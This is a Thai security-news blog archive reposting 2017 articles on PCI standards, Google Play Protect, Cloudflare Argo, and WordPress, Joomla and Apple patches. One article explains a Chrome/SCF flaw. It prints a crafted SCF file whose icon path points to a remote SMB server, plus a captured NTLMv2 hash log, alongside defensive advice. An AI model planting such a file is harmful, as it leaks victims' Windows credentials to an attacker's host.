คลังเก็บป้ายกำกับ: WEB_SECURITY

[PCI Community Meeting 2017] สรุป Roadmap ปี 2017 ของ PCI และแนวโน้มด้านความมั่นคงปลอดภัยล่าสุด

Jeremy King, Stephen W. Orfei และ Troy Leach ผู้บริหารระดับสูงจาก PCI Security Standards Council (PCI SSC) ออกมาอัปเดตถึงแผนงานและ Roadmap ของ PCI SSC ประจำปี 2017 นี้ ชี้มาตรฐาน PCI-DSS ถูกอัปเดตตลอดเวลา เพื่อให้พร้อมรับมือกับภัยคุกคามสมัยใหม่ เช่น Ransomware และแนวโน้มการเข้าสู่ยุคดิจิทัล ไม่ว่าจะเป็นการนำอุปกรณ์พกพา (BYOD) หรือระบบ Cloud เข้ามาใช้ในองค์กร

Jeremy King, International Director จาก PCI กล่าวเปิดงาน

“PCI APAC Community Meeting นี้ถูกจัดขึ้นเพื่อให้ความรู้ เสริมพลัง และป้องกันภัยคุกคามไซเบอร์ที่กำลังเป็นประเด็นสำคัญในยุคดิจิทัล เราพร้อมนำเสนอมาตรฐานและแนวทางปฏิบัติที่ดีที่สุดสำหรับปกป้องข้อมูลสำคัญขององค์กร ที่สำคัญคือเรามีแนวทางในการผลักดันประเด็นด้านความมั่นคงปลอดภัยเข้าสู่ระดับบอร์ดและผู้บริหาร เพื่อให้ธุรกิจตระหนักถึงความสำคัญด้านความมั่นคงปลอดภัย” — Jemery King, International Director จาก PCI กล่าวเปิดงาน

ปกป้องข้อมูลการชำระเงินให้มั่นคงปลอดภัยที่สุด

Stephen W. Orfei ผู้จัดการทั่วไปของ PCI ระบุว่า จุดประสงค์หลักของ PCI ในปี 2017 ยังคงเป็นการปกป้องข้อมูลการชำระเงินให้มีความมั่นคงปลอดภัยสูงสุด ไม่ว่าจะเป็นการกำหนดมาตรฐาน การให้แนวทางปฏิบัติที่ดีที่สุด (Best Practices) และการพัฒนาบุคลากรมให้มีความสามารถ เพื่อช่วยให้ธุรกิจสามารถตรวจจับ รับมือ และป้องกันการโจมตีไซเบอร์และ Data Breach ได้ โดยเฉพาะอย่างยิ่งเมื่อข้อมูลการชำระเงินต้องอยู่บนอุปกรณ์สมาร์ทโฟน แท็บเล็ต และระบบ Cloud

มาตรฐาน PCI ในปี 2017 จะโฟกัสที่ 5 ประเด็นสำคัญ ได้แก่ Payment Applications, Payment Terminals, Payment Card Production and Provisioning, Point-to-point Encryption และ Token Service Providers ซึ่งทาง PCI มี Resource ให้ผู้ที่สนใจสามารถเข้าถึงและดาวน์โหลดได้ฟรี ไม่ว่าจะเป็น มาตรฐาน, แนวทางปฏิบัติที่ดีที่สุด, Infographic, คำแนะนำประเด็นต่างๆ เช่น ATM, Ransomware, รหัสผ่าน และ Webinar

10 ภัยคุกคามหลักที่จำเป็นต้องควบคุม

PCI SSC มี Security Advisors มากถึง 29 คน ซึ่งจะคอยอัปเดตภัยคุกคามและประเด็นด้านความมั่นคงปลอดภัยให้กับองค์กรทั่วโลก รวมไปถึงประสานงานกับ QSA เพื่อให้สามารถตรวจประเมินและให้คำแนะนำได้ตรงประเด็นกับสถานการณ์ล่าสุด

สำหรับปี 2017 นี้ Orfei ได้กล่าวถึงภัยคุกคามสำคัญ 10 ประการที่ทุกองค์กรควรให้ความสนใจและวางมาตรการควบคุม ได้แก่ Weak Passwords, SQL Injection, Spear Phishing, Malware, Remote Access Vector Attack, Poor Patching, Card-Not-Present Fraud, Contactless Payments Vulnerabilities, Account Takeover และ Man in the Middle Attack

แผนงานหลักในปี 2017

เพื่อตอบรับกระแส Digital Transformation ที่ทุกองค์กรทั่วโลก โดยเฉพาะ Startup และ SMB ต่างเริ่มนำเทคโนโลยีเข้ามาใช้สนับสนุนการดำเนินงานเชิงธุรกิจ PCI จึงได้วางแผนงานหลักที่จะดำเนินการในปี 2017 ไว้ 3 รายการ ดังนี้

  • เพิ่มโซลูชันด้านความมั่นคงปลอดภัยให้แก่พ่อค้ารายย่อย – มีการจัดตั้ง Small Merchant Task Force สำหรับช่วยเหลือพ่อค้ารายย่อย เช่น ธุรกิจ e-Commerce ขนาดเล็ก ที่มีทรัพยากรบุคคลจำกัด ให้ตระหนักถึงความสำคัญของความมั่นคงปลอดภัย และมี Resource เช่น คู่มือและคำแนะนำต่างๆ ที่เข้าใจได้ง่าย และให้บริการฟรี
  • สร้างพันธมิตรกับองค์กรและอุตสาหกรรมทั่วโลก – เช่นเดียวกับการจัดงานในกรุงเทพฯ นี้ PCI SSC จะทำงานร่วมกับนานาประเทศและองค์กรต่างๆ ทั่วโลกอย่างใกล้ชิดมากยิ่งขึ้น เพื่อให้ระบบการชำระเงินผ่านบัตรของทุกประเทศมีความมั่นคงปลอดภัย และลดปัญหาอาชญากรรมไซเบอร์
  • ให้คำแนะนำสำหรับความเสี่ยงและเทคโนโลยีที่เกิดขึ้นใหม่ – ออกมาตรฐานและแนวทางปฏิบัติใหม่ๆ ให้สอดคล้องกับความเสี่ยงและเทคโนโลยีในปัจจุบัน รวมไปถึงพยายามทำให้ความมั่นคงปลอดภัยเป็นเรื่องง่ายที่องค์กรทุกระดับสามารถเข้าถึงและนำไปปรับใช้ได้

อัปเดตแนวโน้มสำคัญ 4 ประการ

Troy Leach, CTO จาก PCI ระบุถึง Roadmap ของ PCI ในปี 2017 ซึ่งทาง PCI ต้องการอัปเดตประเด็นสำคัญ 4 ประการให้สอดคล้องกับแนวโน้มด้านความมั่นคงปลอดภัยล่าสุด ดังนี้

  • Inter-connectivity – ยกระดับความมั่นคงปลอดภัยของ 3rd Parties เพื่อให้ Ecosystem ของกระบวนการชำระเงินผ่านบัตรมีความมั่นคงปลอดภัยสูงสุด ที่สำคัญคือ 3rd Parties เหล่านั้นต้องเข้าถึงข้อมูลด้านความมั่นคงปลอดภัยต่างๆ ของ PCI และนำไปปรับใช้ได้ง่าย
  • Authentication – โฟกัสที่การพิสูจน์ตัวตนแบบ Multi-factor Authentication การป้องกัน Card-Not-Present Fraud และการทำให้การทำธุรกรรมผ่านอุปกรณ์พกพามีความมั่นคงปลอดภัย
  • Encryption Attacks – ผลักดันให้องค์กรทั่วโลกเปลี่ยนการให้วิทยาการเข้ารหัสลับแบบเก่า ไปใช้เทคโนโลยีและอัลกอริธึมใหม่ที่มีความมั่นคงปลอดภัยมากยิ่งขึ้น รวมไปถึงหาวิธีรับมือกับการโจมตีในปัจจุบัน เช่น Ransomware
  • Agile with Software Programming – ออกมาตรฐานและแนวทางปฏิบัติสำหรับการทำ Secure Design ให้รองรับกับโมเดลการพัฒนาซอฟต์แวร์รูปแบบใหม่ๆ ในปัจจุบัน เช่น Agile

เนื่องจากปัจจุบันนี้มีการทำธุรกรรมการเงินผ่านทางสมาร์ทโฟนและแท็บเล็ตมากยิ่งขึ้น PCI จึงได้มีการปรับปรุงมาตรฐานและแนวทางปฏิบัติต่างๆ เพื่อให้การทำธุรกรรมเหล่านั้นบนอุปกรณ์พกพามีความมั่นคงปลอดภัยกว่าเดิม ไม่ว่าจะเป็นเรื่องการทำ Tokenization, Over the Air Provisioning, PIN on mPOS และ 3D Secure 2.0 (มาตรฐานเกี่ยวกับการพิสูจน์ตัวตน)

กระตุ้นรัฐบาลให้สนับสนุนทุกอุตสาหกรรมในประเทศไทย

Jeremy King, International Director จาก PCI ให้คำแนะนำแก่ประเทศไทยว่า ถึงแม้ว่า PCI จะนำเสนอมาตรฐานและแนวทางปฏิบัติที่ดีที่สุดเพื่อให้ข้อมูลการชำระเงินมีความมั่นคงปลอดภัย แต่สิ่งสำคัญที่สุดคือรัฐบาลและหน่วยงานที่เกี่ยวข้อง เช่น ธนาคารแห่งประเทศไทยต้องให้การสนับสนุนด้วย ไม่ว่าจะเป็นการสร้างความตระหนักให้แก่อุตสาหกรรมในประเทศไทย การออกกฎข้อบังคับ การพัฒนาบุคลากร และการผลักดันให้นำแนวทางปฏิบัติและมาตรฐานต่างๆ เข้ามาใช้เพื่อยกระดับความมั่นคงปลอดภัยในองค์กรให้พร้อมรับกับการนำเทคโนโลยีเข้ามาใช้ในยุค Thailand 4.0

“ปัญหาสำคัญด้านความมั่นคงปลอดภัยในภูมิภาคเอเชียแปซิฟิกรวมถึงประเทศไทย คือ การส่งข้อมูล Username/Password ในรูปของ Cleartext ซึ่งไม่มีการเข้ารหัสข้อมูล รวมไปถึงการ Hardcode รหัสผ่านลงในโปรแกรม ดังนั้นเรื่องแรกที่คนไทยควรแก้ไขคือการบริหารจัดการรหัสผ่านให้มั่นคงปลอดภัย” — Jeremy King กล่าวใน Panel Discussion

Jeremy King, Stephen W. Orfei และ Troy Leach กำลังถกประเด็นเรื่องภัยคุกคามในปัจจุบัน

เกี่ยวกับ PCI Security Standards Council

PCI SSC เป็นสมาคมที่ถูกก่อตั้งขึ้นโดยมีจุดประสงค์เพื่อให้บริการมาตรฐานด้านความมั่นคงปลอดภัยข้อมูลสำหรับอุตสาหกรรมที่ต้องมีการชำระเงินผ่านบัตร (Payment Card Industry Data Security Standard: PCI-DSS) ซึ่งปัจจุบันมีคณะกรรมการบริหารจาก 5 ผู้ให้บริการบัตรเครดิตรายใหญ่ ได้แก่ American Express, Discover , JCB, MasterCard และ Visa รวมไปถึงมี Board of Advisor อีก 39 ราย ไม่ว่าจะเป็น Amazon, Cisco, Citibanks, Microsoft, Paypal, Starbucks และอื่นๆ สำหรับให้คำปรึกษา ข้อเสนอแนะ และความคิดเห็นต่างๆ เกี่ยวกับความมั่นคงปลอดภัยของการใช้บัตรชำระเงิน

PCI SSC มีศูนย์ปฏิบัติการกระจายอยู่ 9 แห่งทั่วโลก ครอบคลุมทุกภูมิภาค และมีการประสานการทำงานร่วมกับหน่วยงานรัฐและสถาบันการเงินมากมาย เช่น APCA, Bank of India, FBI, Interpol, JCDSC และ Ministry of Economy, Trade and Industry เพื่อให้มั่นใจว่ามาตรฐานและแนวทางปฏิบัติต่างๆ ที่นำเสนอ นอกจากจะช่วยปกป้องข้อมูลการชำระเงิน ยังสอดคล้องกับกฏหมายและข้อบังคับของแต่ละประเทศอีกด้วย

ปัจจุบันนี้มีองค์กรทั่วโลกที่เป็นสมาชิกของ PCI แล้ว 816 องค์กร ซึ่งเป็นองค์กรในภูมิภาคเอเชียแปซิฟิก (รวมประเทศไทย) 49 องค์กร

from:https://www.techtalkthai.com/pci-community-meeting-2017-keynote-day-1/

Advertisements

Google เพิ่ม Google Play Protect ระบบตรวจจับมัลแวร์บน Android ทุกเครื่อง

เพื่อที่จะให้ผู้ใช้ Android ทั่วโลกปลอดภัยจากมัลแวร์ Google ได้ทำการเพิ่มฟีเจอร์ระบบป้องกันเรียกว่า Google Play Protect ลงบนแอพพลิเคชัน Google Play Store ซึ่งใช้เทคนิค Machine Learning และ App Usage Analysis ในการตรวจจับแอพพลิเคชันปลอมหรือมีอันตรายใน Google Play

Google Play Protect เป็นฟีเจอร์ที่มาพร้อมกับแอพพลิเคชัน Google Play Store และพร้อมเปิดใช้งานตลอดเวลา นั่นหมายความว่าผู้ใช้ไม่จำเป็นต้องติดตั้งหรือสั่งเริ่มใช้งานเพิ่มเติมแต่อย่างใด โดย Google Play Protect ประกอบด้วยคุณสมบัติ 3 รายการ คือ App Scanning, Anti-theft Measures และ Browser Protection นอกจากนี้ Google ยังระบุว่า แต่ละวัน Google Play Protect จะสแกนแอพพลิเคชันกว่า 50,000 ล้านบนอุปกรณ์ Android ทั่วโลกกว่าพันล้านเครื่อง เพื่อให้มั่นใจว่าผู้ใช้ทุกคนปลอดภัย

ที่จริงแล้ว Google มีระบบรักษาความมั่นคงปลอดภัยสำหรับตรววจจับและรับมือกับมัลแวร์หลายรายการ ไม่ว่าจะเป็น Verify Apps หรือ Bouncer Service อย่างไรก็ตาม เมื่อแอพพลิเคชันผ่านการตรวจสอบและถูกอัปโหลดเข้า Play Store หรือติดตั้งลงบนอุปกรณ์ Android แล้ว Google ไม่มีระบบที่คอยติดตามและเฝ้าระวังพฤติกรรมของแอพพลิเคชันเหล่านี้แต่อย่างใด ส่งผลให้มีแอพพลิเคชันหลายรายการที่กลายเป็นมัลแวร์ดังที่ปรากฏตามข่าวอยู่เรื่อยๆ

Google Play Protect มาพร้อมกับคุณสมบัติ 3 รายการ ดังนี้

  • App Scanning – คอยทำงานอยู่เบื้องหลังตลอดเวลา ซึ่งพร้อมตรวจสอบแอพพลิเคชันใหม่ที่ปรากฎบน Play Store และคอยติดตามพฤติกรรมของแอพพลิเคชันเหล่านั้น รวมไปถึงแอพพลิเคชันที่โหลดมาจาก 3rd Party Store หลังถูกติดตั้งลงบนเครื่องด้วยเทคนิค Machine Learning
  • Anti-theft Measures – ฟีเจอร์ Find My Device ที่นำมาแทนที่ Android Device Manager สำหรับค้นหาตำแหน่งเมื่ออุปกรณ์สูญหาย ซึ่งเจ้าของอุปกรณ์สามารถใช้เบราเซอร์หรืออุปกรณ์คนอื่นในการโทร ระบุตำแหน่ง ล็อกเครื่อง หรือแม้แต่สั่งลบข้อมูลจากระยะไกลได้
  • Browser Protection – ฟีเจอร์ Safe Browsing บน Google Chrome สำหรับเพิ่มความมั่นคงปลอดภัยในการท่องเว็บ ปกป้องผู้ใช้จากมัลแวร์ที่แฝงตัวมากับเว็บไซต์ต่างๆ

ฟีเจอร์ Google Play Protect นี้จะพร้อมให้ผู้ใช้ Android ใช้บริการสัปดาห์หน้านี้

ที่มา: http://thehackernews.com/2017/05/google-play-protect-android.html

from:https://www.techtalkthai.com/google-play-protect-on-android/

Cloudflare เปิดตัว Argo ระบบ Virtual Backbone ช่วยแก้ปัญหาเว็บไซต์ช้า

Cloudflare เปิดตัว Argo ระบบ Virtual Backbone ช่วยแก้ปัญหาเว็บไซต์ช้า

Cloudflare ได้เปิดตัวบริการใหม่ในชื่อ Argo ซึ่งเป็นระบบ Virtual Backbone ที่เข้ามาช่วยแก้ไขปัญหา Link ระหว่าง Client และ Web Server ที่ช้า โดยปกติแล้วการ Access เว็บไซท์ต่างๆจะต้องมีการ Route Traffic ผ่านทาง Link ของ ISP ต่างๆ ซึ่ง Link ที่สั้นที่สุดนั้นไม่ได้หมายความว่าจะให้ Response Time ได้ต่ำที่สุดเสมอ เนื่องจากอาจเกิด Network Congestion ขึ้นเส้นทางเหล่านั้น ซึ่งส่งผลให้เกิด Packet Drop ระหว่างทางได้ และหากมีการวิ่งข้ามประเทศก็จะเพิ่มโอกาสเกิดเหตุการณ์เหล่านี้ขึ้นไปอีก

Argo มีระบบ Smart Routing ที่เข้ามาแก้ไขจุดอ่อนของ BGP Routing ซึ่งใช้งานกันมานานแล้ว โดยระบบจะอาศัยการเก็บข้อมูล Network Latency และ Packet Loss จาก PoPs ของ Cloudflare ที่มีอยู่ตาม ISP กว่า 115 จุดทั่วโลก หลังจากนั้นนำมาประมวลผลเพื่อหาเส้นทางที่เร็วและเหมาะสมที่สุด และระบบจะทำการ Encrypted ข้อมูล ก่อนจะส่งผ่าน PoPs เหล่านั้นในลักษณะของ Tunnel ไปจนถึงปลายทาง ซึ่งจากการทดสอบแล้ว Argo ช่วยลด Latency ลงได้ถึง 35% และลด Connection Error ถึง 27% นอกจากนี้ Argo ยังมีความสามารถในการทำ Tiered Cache ซึ่งช่วยในการ Cache ข้อมูลไว้ที่ PoPs ต่างๆ ส่งผลให้สามารถลดโอกาสเกิด Cache Miss ถึง 60% เลยทีเดียว

ผู้ที่สนใจสามารถ Enable ใช้งาน Argo Service ได้ทันทีในหน้า Dashboard ของ Cloudflare โดยจะมีการคิดค่าบริการอยู่ที่ $5 ต่อ domain ต่อเดือน และคิดค่าบริการในการส่งข้อมูลอยู่ที่ $0.10 ต่อ GB

ที่มา : https://blog.cloudflare.com/argo/

from:https://www.techtalkthai.com/cloudflare-announces-argo-virtual-backbone-service-fix-slow-web-sites/

WordPress เตือนผู้ใช้งานอุดช่องโหว่ XSS และ CSRF อายุ 10 เดือน ด้วยการอัปเดตเป็นรุ่น 4.7.5

WordPress ได้แนะนำให้เหล่า Webmaster ทำการอัปเดตเป็น WordPress รุ่น 4.7.5 ทันที เนื่องจากอัปเดตรุ่นนี้ได้อุดช่องโหว่สำคัญสองรายการ ได้แก่ Cross-site Scripting (XSS) และ Cross-site Request Forgery (CSRF) ที่ปรากฏอยู่ในโค้ดของ WordPress มาเป็นเวลากว่า 10 เดือน

 

อัปเดตนี้ถูกปล่อยออกมาตั้งแต่วันอังคารที่ผ่านมา โดยรวมแล้วมีการแก้ปัญหาต่างๆ ด้วยกันทั้งสิ้นถึง 6 รายการ ซึ่งเป็น XSS สองรายการ และเป็น CSRF อีก 1 รายการ รวมถึงช่องโหว่อื่นๆ ด้วย

เอาเป็นว่าใครใช้ WordPress ก็ไปอัปเดตกันให้เรียบร้อยก่อนจะถูกโจมตีกันนะครับ

 

ที่มา: https://threatpost.com/wordpress-fixes-csrf-xss-bugs-announces-bug-bounty-program/125777/

from:https://www.techtalkthai.com/wordpress-4-7-5-is-released-with-fixes-for-xss-and-csrf/

Joomla! 3.7.1 ออกแล้ว อุดช่องโหว่ความรุนแรงระดับสูงสุด ควรอัปเดตทันที

หลังจากที่ Joomla! ได้ออกมาเตือนล่วงหน้าประมาณ 1 สัปดาห์เกี่ยวกับช่องโหว่ความรุนแรงระดับสูงสุด และแนะนำให้ผู้ใช้งานทุกคนทำการอัปเดตทันทีที่รุ่น 3.7.1 ออก ตอนนี้ Joomla! ได้ออกรุ่น 3.7.1 ซึ่งอุดช่องโหว่ดังกล่าวแล้ว และช่องโหว่นั้นก็คือ SQL Injection ที่ปรากฏอยู่บน Joomla! 3.7.0 นั่นเอง

 

นอกจากการอุดช่องโหว่ SQL Injection นี้แล้ว ก็ยังมีการแก้ไขบั๊กต่างๆ อีกมากมายด้วย โดยสำหรับผู้ที่ต้องการติดตั้ง Joomla! 3.7.1 ใหม่เลยสามารถโหลดได้ที่ https://downloads.joomla.org/cms/joomla3/3-7-1/joomla_3-7-1-stable-full_package-zip?format=zip ส่วนผู้ที่ต้องการอัปเกรดสามารถโหลดได้ที่ https://downloads.joomla.org/cms/joomla3/3-7-1 โดยควรอ่านคู่มืออัปเดต https://docs.joomla.org/J3.x:Updating_from_an_existing_version ก่อนการติดตั้งจริงครับ

 

ที่มา: https://www.joomla.org/announcements/release-news/5705-joomla-3-7-1-release.html

from:https://www.techtalkthai.com/joomla-3-7-1-is-released-to-fix-critical-sql-injection-vulnerability/

เตือน !! ช่องโหว่บน Chrome เสี่ยงถูกแฮ็คเกอร์ขโมยข้อมูลล็อกอิน

Bosko Stankovic นักวิจัยด้านความมั่นคงปลอดภัยจาก DefenseCode ออกมาแจ้งเตือนถึงช่องโหว่บนการตั้งค่าเริ่มต้นของ Google Chrome เวอร์ชันล่าสุด ซึ่งช่วยให้แฮ็คเกอร์สามารถขโมยข้อมูลล็อกอินของผู้ใช้ระบบปฏิบัติการ Windows แม้แต่ Windows 10 ที่อัปเดตแพทช์ล่าสุดจากระยะไกลได้ ชี้เป็นช่องโหว่แบบเดียวกับที่ Stuxnet ใช้โจมตีโรงไฟฟ้านิวเคลียร์ของอิหร่าน

Credit: ShutterStock.com

Stankovic ระบุว่า เพียงแค่ผู้ใช้เข้าถึงโฟลเดอร์ที่มีไฟล์ SCF ที่แฮ็คเกอร์ออกแบบมาเป็นพิเศษ ข้อมูลล็อกอินของผู้ใช้ เช่น ชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชจะถูกส่งไปยังแฮ็คเกอร์ผ่านทาง Google Chrome และโปรโตคอล SMB ทันที โดยการโจมตีนี้อาศัยการผสาน 2 เทคนิคเข้าด้วยกัน คือ เทคนิคที่ Stuxnet ใช้ และเทคนิคที่ถูกเผยแพร่ในงานประชุม Black Hat ปี 2015

SCF (Shell Command File) เป็นไฟล์ Shortcut แบบหนึ่งที่ทำงานคล้ายกับไฟล์ LNK และถูกออกแบบมาเพื่อรองรับการรันคำสั่ง Windows Explorer ในระดับหนึ่ง เช่น เปิดหน้าต่าง Windows Explorer หรือแสดงหน้า Desktop โดยพื้นฐานแล้ว ลิงค์ Shortcut บนหน้า Desktop จะเป็นไฟล์ Text ที่มี Syntax ของ Shell Code เฉพาะตัว ซึ่งจะกำหนดตำแหน่งของไฟล์ไอคอนที่จะโหลด ชื่อแอพพลิเคชัน และตำแหน่งของแอพพลิเคชัน เช่น

[Shell]
Command=2
IconFile=explorer.exe,3

เนื่องจาก Chrome เชื่อว่าไฟล์ SCF ของ Windows เป็นไฟล์ปกติ ส่งผลให้แฮ็คเกอร์สามารถหลอกให้เหยื่อเข้าไปยังหน้าเว็บไซต์ของตนเองซึ่งแฝงไฟล์ SCF ที่ออกแบบมาเป็นพิเศษ ไฟล์ดังกล่าวจะถูกดาวน์โหลดไปยังเครื่องของเหยื่อโดยอัตโนมัติโดยที่ไม่มีการเด้งหน้าต่างแจ้งเตือนหรือให้กดยืนยันใดๆ และตราบเท่าที่เหยื่อเปิดโฟลเดอร์ที่มีไฟล์ SCF นั้นอยู่ ไม่ช้าก็เร็ว ไฟล์ดังกล่าวจะรันตัวเองเพื่อโหลดไฟล์ไอคอนมา ต่อให้เหยื่อไม่คลิกบนไฟล์นั้นก็ตาม

แฮ็คเกอร์จึงอาศัยช่องโหว่ของการทำงานของ Chrome และไฟล์ SCF นี้ ในการแก้ไขตำแหน่งของไฟล์ไอคอนไปเป็นตำแหน่งของ SMB Server ของตนเองแทน ส่งผลให้เมื่อไฟล์ SCF พยายามที่จะโหลดไฟล์ไอคอนมา มันจะถูกหลอกให้ทำการพิสูจน์ตัวตนกับ Remote Server ของแฮ็คเกอร์ผ่านทางโปรโตคอล SMB ซึ่งข้อมูลชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชจะถูกส่งไปพิสูจน์ตัวตนโดยอัตโนมัติ ผลลัพธ์คือแฮ็คเกอร์ได้ข้อมูลล็อกอินของเหยื่อโดยทันที

[Shell]
IconFile=\\170.170.170.170\icon

เทคนิคนี้เป็นเทคนิคเดียวกับที่ Stuxnet เคยใช้กับไฟล์ LNK ในอดีต ส่งผลให้ Microsoft บังคับให้ไฟล์ LNK โหลดไฟล์ไอคอนจากภายในเครื่องคอมพิวเตอร์ของตัวเองเท่านั้น ทำให้ช่องโหว่บนไฟล์ LNK หายไป แต่บนไฟล์ SCF ยังคงมีอยู่

คำถามถัดมา แล้วทำไมคอมพิวเตอร์ถึงส่งข้อมูลชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชไปพิสูจน์ตัวตนกับ SMB Server ของแฮ็คเกอร์โดยอัตโนมัติ ?

คำตอบคือ สาเหตุมาจากกลไกการพิสูจน์ตัวตนผ่าน NTLM Challenge/Response ผ่านทางโปรโตคอล SMB ซึ่งสรุปการทำงานได้เป็น 4 ขั้นตอน ดังนี้

  1. ผู้ใช้ Windows พยายามล็อกอินเข้าสู่ Server
  2. Server ตอบกลับด้วยการ Challenge โดยบอกให้ผู้ใช้เข้ารหัสค่าที่ใช้ Challenge โดยใช้รหัสผ่านที่ถูกแฮช แล้วส่งกลับมา
  3. Windows จัดการคำร้องขอของ Server โดยส่งชื่อผู้ใช้และรหัสผ่านที่ถูกแฮช (ผ่านทางการเข้ารหัสค่าที่ใช้ Challenge) กลับไปยัง Server
  4. Server รับคำตอบและยืนยันการพิสูจน์ตัวตนในกรณีที่รหัสผ่านทีถูกแฮชมาค่าถูกต้อง

ดังนั้น เมื่อเทียบกับการโจมตีผ่านไฟล์ SCF เครื่องของเหยื่อจะพยายามพิสูจน์ตัวตนกับ SMB Server โดยอัตโนมัติ โดยส่งชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชด้วย NTLMv2 กลับไปยัง SMB Server ตามขั้นตอนที่ 3 ในกรณีที่ผู้ใช้อยู่ในเครือข่ายขององค์กร ข้อมูลล็อกอินที่ถูกส่งไปยังแฮ็คเกอร์จะเป็นข้อมูลที่ SysAdmin ขององค์กรกำหนดให้ แต่ในกรณีที่เป็นผู้ใช้ตามบ้าน ข้อมูลล็อกอินของ Windows จะถูกส่งไปแทน

[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

ถึงแม้ว่ารหัสผ่านจะถูกแฮชอยู่ แต่ไม่ใช่เรื่องยากที่แฮ็คเกอร์จะทำการ Brute Force เพื่อให้ได้รหัสผ่านในรูปของ Plain Text

วิธีป้องกันการโจมตีแบบนี้สามารถทำได้ง่ายมาก เพียงแค่ใช้ Firewall บล็อกการเชื่อมต่อ SMB จากภายในที่ส่งไปภายนอก (TCP พอร์ต 139 และ 445) เพื่อไม่ให้เครื่องคอมพิวเตอร์เชื่อมต่อกับ SMB Server ภายนอกองค์กร นอกจากนี้ Stankovic ยังแนะนำให้ผู้ใช้ยกเลิกการดาวน์โหลดไฟล์อัตโนมัติบน Google Chrome โดยไปที่ Settings → Show advanced settings → และเลือก “Ask where to save each file before downloading” เพื่อให้ผู้ใช้สามารถตรวจสอบไฟล์ที่ดาวน์โหลดเข้าสู่เครื่องคอมพิวเตอร์ก่อนได้ทุกครั้ง

ที่มา: http://thehackernews.com/2017/05/chrome-windows-password-hacking.html

from:https://www.techtalkthai.com/hackers-can-steal-windows-credentials-via-chrome-and-smb/

Apple ออกแพทช์อุดช่องโหว่บนผลิตภัณฑ์รวม 67 รายการ

ในขณะที่ WannaCry Ransomware แพร่ระบาดผ่านช่องโหว่ของ Windows อยู่ในขณะนี้ ผู้ใช้ผลิตภัณฑ์จาก Apple ไม่ควรชะล่าใจ ล่าสุด Apple ออกแพทช์รวม 67 รายการสำหรับอุดช่องโหว่บน iOS, macOS, Safari, tvOS, iCloud และ watchOS แนะนำให้ผู้ใช้อัปเดตก่อนที่จะตกเป็นเหยื่อของแฮ็คเกอร์

ช่องโหว่ทั้ง 67 รายการนี้ ส่วนใหญ่ช่วยให้แฮ็คเกอร์สามารถโจมตีแบบ Remote Code Execution ได้ นั่นหมายความว่าแฮ็คเกอร์สามารถลอบส่งโค้ดแปลกปลอมเข้ามารันบนอุปกรณ์จากระยะไกล หรือเข้าควบคุมอุปกรณ์ได้ทันที ดูรายละเอียดได้ที่ตารางด้านล่าง

ลิงค์รายละเอียด แพทช์สำหรับ จำนวนช่องโหว่
iOS 10.3.2 iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation 43
macOS Sierra 10.12.5, Security Update 2017-002 El Capitan, and Security Update 2017-002 Yosemite macOS Sierra 10.12.4, OS X El Capitan 10.11.6, and OS X Yosemite 10.10.5 37
watchOS 3.2.2 All Apple Watch models 13
iTunes 12.6.1 for Windows Windows 7 and later 1
Safari 10.1.1 OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.5 27
iCloud for Windows 6.2.1 Windows 7 and later 1
tvOS 10.2.1 Apple TV (4th generation) 23

ที่มา: https://www.bleepingcomputer.com/news/apple/apple-ios-10-3-2-and-other-core-os-security-updates-released/

from:https://www.techtalkthai.com/apple-patches-67-vulns/